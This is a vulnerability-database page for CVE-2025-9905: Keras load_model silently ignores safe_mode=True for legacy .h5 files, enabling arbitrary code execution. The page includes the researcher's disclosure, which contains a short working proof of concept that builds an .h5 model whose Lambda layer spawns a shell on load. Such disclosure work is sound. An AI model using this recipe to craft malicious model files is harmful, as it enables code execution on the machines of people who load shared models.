Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-9905 (GCVE-0-2025-9905)
Vulnerability from cvelistv5 – Published: 2025-09-19 08:16 – Updated: 2025-09-20 03:55
VLAI?
EPSS
Summary
The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True.
One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.
This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives.
Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.
Severity ?
CWE
- CWE-913 - Improper Control of Dynamically-Managed Code Resources
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Keras-team | Keras |
Affected:
3.0.0 , ≤ 3.11.2
(semver)
|
Credits
Gabriele Digregorio
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-9905",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-19T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-20T03:55:40.926Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://github.com/keras-team/keras",
"defaultStatus": "unaffected",
"packageName": "keras",
"product": "Keras",
"repo": "https://github.com/keras-team/keras",
"vendor": "Keras-team",
"versions": [
{
"lessThanOrEqual": "3.11.2",
"status": "affected",
"version": "3.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gabriele Digregorio"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eThe Keras \u003ccode\u003eModel.load_model\u003c/code\u003e\u0026nbsp;method can be exploited to achieve arbitrary code execution, even with \u003ccode\u003esafe_mode=True\u003c/code\u003e.\u003c/p\u003e\u003cp\u003eOne can create a specially crafted \u003ccode\u003e.h5\u003c/code\u003e/\u003ccode\u003e.hdf5\u003c/code\u003e\u0026nbsp;model archive that, when loaded via \u003ccode\u003eModel.load_model\u003c/code\u003e, will trigger arbitrary code to be executed.\u003c/p\u003e\u003cp\u003eThis is achieved by crafting a special \u003ccode\u003e.h5\u003c/code\u003e\u0026nbsp;archive file that uses the \u003ccode\u003eLambda\u003c/code\u003e\u0026nbsp;layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the \u003ccode\u003esafe_mode=True\u003c/code\u003e\u0026nbsp;option is not honored when reading \u003ccode\u003e.h5\u003c/code\u003e\u0026nbsp;archives.\u003c/p\u003e\u003cp\u003eNote that the \u003ccode\u003e.h5\u003c/code\u003e/\u003ccode\u003e.hdf5\u003c/code\u003e\u0026nbsp;format is a legacy format supported by Keras 3 for backwards compatibility.\u003c/p\u003e\u003cbr\u003e"
}
],
"value": "The Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\n\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\n\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\n\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility."
}
],
"impacts": [
{
"capecId": "CAPEC-175",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-175 Code Inclusion"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "PRESENT",
"attackVector": "LOCAL",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-913",
"description": "CWE-913 Improper Control of Dynamically-Managed Code Resources",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-19T08:16:44.772Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://github.com/keras-team/keras/pull/21602"
},
{
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Arbitary Code execution in Keras load_model()",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2025-9905",
"datePublished": "2025-09-19T08:16:44.772Z",
"dateReserved": "2025-09-03T07:27:18.212Z",
"dateUpdated": "2025-09-20T03:55:40.926Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-9905\",\"sourceIdentifier\":\"cve-coordination@google.com\",\"published\":\"2025-09-19T09:15:36.033\",\"lastModified\":\"2025-09-23T16:53:40.050\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\\n\\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\\n\\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\\n\\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.3,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-913\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:keras:keras:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.0.0\",\"versionEndExcluding\":\"3.11.3\",\"matchCriteriaId\":\"315FD6FA-C1F3-47FD-AE5D-DF4D556D657F\"}]}]}],\"references\":[{\"url\":\"https://github.com/keras-team/keras/pull/21602\",\"source\":\"cve-coordination@google.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv\",\"source\":\"cve-coordination@google.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-9905\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-09-19T11:47:46.060479Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-09-19T11:48:23.572Z\"}}], \"cna\": {\"title\": \"Arbitary Code execution in Keras load_model()\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Gabriele Digregorio\"}], \"impacts\": [{\"capecId\": \"CAPEC-175\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-175 Code Inclusion\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"Safety\": \"NOT_DEFINED\", \"version\": \"4.0\", \"Recovery\": \"NOT_DEFINED\", \"baseScore\": 7.3, \"Automatable\": \"NOT_DEFINED\", \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"valueDensity\": \"NOT_DEFINED\", \"vectorString\": \"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\", \"providerUrgency\": \"NOT_DEFINED\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"HIGH\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"repo\": \"https://github.com/keras-team/keras\", \"vendor\": \"Keras-team\", \"product\": \"Keras\", \"versions\": [{\"status\": \"affected\", \"version\": \"3.0.0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"3.11.2\"}], \"packageName\": \"keras\", \"collectionURL\": \"https://github.com/keras-team/keras\", \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/keras-team/keras/pull/21602\", \"tags\": [\"patch\"]}, {\"url\": \"https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv\"}], \"x_generator\": {\"engine\": \"Vulnogram 0.2.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"The Keras Model.load_model\\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\\n\\nOne can create a specially crafted .h5/.hdf5\\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\\n\\nThis is achieved by crafting a special .h5\\u00a0archive file that uses the Lambda\\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\\u00a0option is not honored when reading .h5\\u00a0archives.\\n\\nNote that the .h5/.hdf5\\u00a0format is a legacy format supported by Keras 3 for backwards compatibility.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"\u003cp\u003eThe Keras \u003ccode\u003eModel.load_model\u003c/code\u003e\u0026nbsp;method can be exploited to achieve arbitrary code execution, even with \u003ccode\u003esafe_mode=True\u003c/code\u003e.\u003c/p\u003e\u003cp\u003eOne can create a specially crafted \u003ccode\u003e.h5\u003c/code\u003e/\u003ccode\u003e.hdf5\u003c/code\u003e\u0026nbsp;model archive that, when loaded via \u003ccode\u003eModel.load_model\u003c/code\u003e, will trigger arbitrary code to be executed.\u003c/p\u003e\u003cp\u003eThis is achieved by crafting a special \u003ccode\u003e.h5\u003c/code\u003e\u0026nbsp;archive file that uses the \u003ccode\u003eLambda\u003c/code\u003e\u0026nbsp;layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the \u003ccode\u003esafe_mode=True\u003c/code\u003e\u0026nbsp;option is not honored when reading \u003ccode\u003e.h5\u003c/code\u003e\u0026nbsp;archives.\u003c/p\u003e\u003cp\u003eNote that the \u003ccode\u003e.h5\u003c/code\u003e/\u003ccode\u003e.hdf5\u003c/code\u003e\u0026nbsp;format is a legacy format supported by Keras 3 for backwards compatibility.\u003c/p\u003e\u003cbr\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-913\", \"description\": \"CWE-913 Improper Control of Dynamically-Managed Code Resources\"}]}], \"providerMetadata\": {\"orgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"shortName\": \"Google\", \"dateUpdated\": \"2025-09-19T08:16:44.772Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-9905\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-09-20T03:55:40.926Z\", \"dateReserved\": \"2025-09-03T07:27:18.212Z\", \"assignerOrgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"datePublished\": \"2025-09-19T08:16:44.772Z\", \"assignerShortName\": \"Google\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-36RR-WW3J-VRJV
Vulnerability from github – Published: 2025-09-19 20:12 – Updated: 2025-09-19 20:12
VLAI?
Summary
The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.
Details
Note: This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your SECURITY.md, but received no response.
Summary
When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not require any sophisticated technique—.h5 and .hdf5 files are simply not checked for unsafe code execution.
From this point on, I will refer only to the .h5 file format, though everything equally applies to .hdf5.
Details
Intended behaviour
According to the official Keras documentation, safe_mode is defined as:
safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.
I understand that the behavior described in this report is somehow intentional, as safe_mode is only applicable to .keras models.
However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. .h5 files can still be loaded seamlessly using load_model with safe_mode=True, and the absence of any warning or error creates a false sense of security. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if safe_mode cannot be applied to a given file format, an explicit error should be raised to alert the user.
This issue is particularly critical given the widespread use of the .h5 format, despite the introduction of newer formats.
As a small anecdotal test, I asked several of my colleagues what they would expect when loading a .h5 file with safe_mode=True. None of them expected the setting to be silently ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers—experts in binary or ML security—and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.
Technical Details
Examining the implementation of load_model in keras/src/saving/saving_api.py, we can see that the safe_mode parameter is completely ignored when loading .h5 files. Here's the relevant snippet:
def load_model(filepath, custom_objects=None, compile=True, safe_mode=True):
is_keras_zip = ...
is_keras_dir = ...
is_hf = ...
# Support for remote zip files
if (
file_utils.is_remote_path(filepath)
and not file_utils.isdir(filepath)
and not is_keras_zip
and not is_hf
):
...
if is_keras_zip or is_keras_dir or is_hf:
...
if str(filepath).endswith((".h5", ".hdf5")):
return legacy_h5_format.load_model_from_hdf5(
filepath, custom_objects=custom_objects, compile=compile
)
As shown, when the file format is .h5 or .hdf5, the method delegates to legacy_h5_format.load_model_from_hdf5, which does not use or check the safe_mode parameter at all.
Solution
Since the release of the new .keras format, I believe the simplest and most effective way to address this misleading behavior—and to improve security in Keras—is to have the safe_mode parameter raise an explicit error when safe_mode=True is used with .h5/.hdf5 files. This error should be clear and informative, explaining that the legacy format does not support safe_mode and outlining the associated risks of loading such files.
I recognize this fix may have minor backward compatibility considerations.
If you confirm that you're open to this approach, I’d be happy to open a PR that includes the missing check.
PoC
From the attacker’s perspective, creating a malicious .h5 model is as simple as the following:
import keras
f = lambda x: (
exec("import os; os.system('sh')"),
x,
)
model = keras.Sequential()
model.add(keras.layers.Input(shape=(1,)))
model.add(keras.layers.Lambda(f))
model.compile()
keras.saving.save_model(model, "./provola.h5")
From the victim’s side, triggering code execution is just as simple:
import keras
model = keras.models.load_model("./provola.h5", safe_mode=True)
That’s all. The exploit occurs during model loading, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.
As expected, the attacker can substitute the exec(...) call with any payload. Whatever command is used will execute with the same permissions as the Keras application.
Attack scenario
The attacker may distribute a malicious .h5/.hdf5 model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model—even with safe_mode=True that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.
Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.11.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-9905"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-19T20:12:05Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "**Note:** This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I\u2019ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your `SECURITY.md`, but received no response.\n\n---\n\n## Summary\n\nWhen a model in the `.h5` (or `.hdf5`) format is loaded using the Keras `Model.load_model` method, the `safe_mode=True` setting is **silently** ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim\u2019s machine with the same privileges as the Keras application. This report is specific to the `.h5`/`.hdf5` file format. The attack works regardless of the other parameters passed to `load_model` and does not require any sophisticated technique\u2014`.h5` and `.hdf5` files are simply not checked for unsafe code execution.\n\nFrom this point on, I will refer only to the `.h5` file format, though everything equally applies to `.hdf5`.\n\n## Details\n\n### Intended behaviour \nAccording to the official Keras documentation, `safe_mode` is defined as:\n\n```\nsafe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.\n```\nI understand that the behavior described in this report is somehow **intentional**, as `safe_mode` is only applicable to `.keras` models. \n\nHowever, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. `.h5` files can still be loaded seamlessly using `load_model` with `safe_mode=True`, and the absence of any warning or error creates a **false sense of security**. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if `safe_mode` cannot be applied to a given file format, an explicit error should be raised to alert the user.\n\nThis issue is particularly critical given the widespread use of the `.h5` format, despite the introduction of newer formats.\n\nAs a small anecdotal test, I asked several of my colleagues what they would expect when loading a `.h5` file with `safe_mode=True`. None of them expected the setting to be **silently** ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers\u2014experts in binary or ML security\u2014and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.\n\n### Technical Details\n\nExamining the implementation of `load_model` in `keras/src/saving/saving_api.py`, we can see that the `safe_mode` parameter is completely ignored when loading `.h5` files. Here\u0027s the relevant snippet:\n\n```python\ndef load_model(filepath, custom_objects=None, compile=True, safe_mode=True):\n is_keras_zip = ...\n is_keras_dir = ...\n is_hf = ...\n\n # Support for remote zip files\n if (\n file_utils.is_remote_path(filepath)\n and not file_utils.isdir(filepath)\n and not is_keras_zip\n and not is_hf\n ):\n ...\n\n if is_keras_zip or is_keras_dir or is_hf:\n ...\n\n if str(filepath).endswith((\".h5\", \".hdf5\")):\n return legacy_h5_format.load_model_from_hdf5(\n filepath, custom_objects=custom_objects, compile=compile\n )\n```\n\nAs shown, when the file format is `.h5` or `.hdf5`, the method delegates to `legacy_h5_format.load_model_from_hdf5`, which does not use or check the `safe_mode` parameter at all.\n\n### Solution\n\nSince the release of the new `.keras` format, I believe the simplest and most effective way to address this misleading behavior\u2014and to improve security in Keras\u2014is to have the `safe_mode` parameter raise an **explicit error** when `safe_mode=True` is used with `.h5`/`.hdf5` files. This error should be clear and informative, explaining that the legacy format does not support `safe_mode` and outlining the associated risks of loading such files.\n\nI recognize this fix may have minor backward compatibility considerations.\n\nIf you confirm that you\u0027re open to this approach, I\u2019d be happy to open a PR that includes the missing check.\n\n\n## PoC\n\nFrom the attacker\u2019s perspective, creating a malicious `.h5` model is as simple as the following:\n\n```python\nimport keras\n\nf = lambda x: (\n exec(\"import os; os.system(\u0027sh\u0027)\"),\n x,\n)\n\nmodel = keras.Sequential()\nmodel.add(keras.layers.Input(shape=(1,)))\nmodel.add(keras.layers.Lambda(f))\nmodel.compile()\n\nkeras.saving.save_model(model, \"./provola.h5\")\n```\n\nFrom the victim\u2019s side, triggering code execution is just as simple:\n\n```python\nimport keras\n\nmodel = keras.models.load_model(\"./provola.h5\", safe_mode=True)\n```\n\nThat\u2019s all. The exploit occurs **during model loading**, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.\n\n\nAs expected, the attacker can substitute the `exec(...)` call with any payload. Whatever command is used will execute with the same permissions as the Keras application.\n\n## Attack scenario\n\nThe attacker may distribute a malicious `.h5`/`.hdf5` model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model\u2014*even with* `safe_mode=True` that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.\n\nOnce the model is loaded, the attacker gains the ability to execute arbitrary code on the victim\u2019s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.",
"id": "GHSA-36rr-ww3j-vrjv",
"modified": "2025-09-19T20:12:05Z",
"published": "2025-09-19T20:12:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/pull/21602"
},
{
"type": "PACKAGE",
"url": "https://github.com/keras-team/keras"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded."
}
GHSA-77WQ-646F-JRM2
Vulnerability from github – Published: 2025-09-19 09:31 – Updated: 2025-09-19 17:34
VLAI?
Summary
Duplicate Advisory: The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.
Details
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references.
Original Description
The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True.
One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.
This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives.
Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.11.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-19T17:34:15Z",
"nvd_published_at": "2025-09-19T09:15:36Z",
"severity": "HIGH"
},
"details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references.\n\n### Original Description\nThe Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\n\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\n\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\n\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility.",
"id": "GHSA-77wq-646f-jrm2",
"modified": "2025-09-19T17:34:15Z",
"published": "2025-09-19T09:31:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/pull/21602"
},
{
"type": "PACKAGE",
"url": "https://github.com/keras-team/keras"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
],
"summary": "Duplicate Advisory: The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.",
"withdrawn": "2025-09-19T17:34:15Z"
}
FKIE_CVE-2025-9905
Vulnerability from fkie_nvd - Published: 2025-09-19 09:15 - Updated: 2025-09-23 16:53
Severity ?
Summary
The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True.
One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.
This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives.
Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.
References
| URL | Tags | ||
|---|---|---|---|
| cve-coordination@google.com | https://github.com/keras-team/keras/pull/21602 | Issue Tracking, Patch | |
| cve-coordination@google.com | https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv | Exploit, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:keras:keras:*:*:*:*:*:*:*:*",
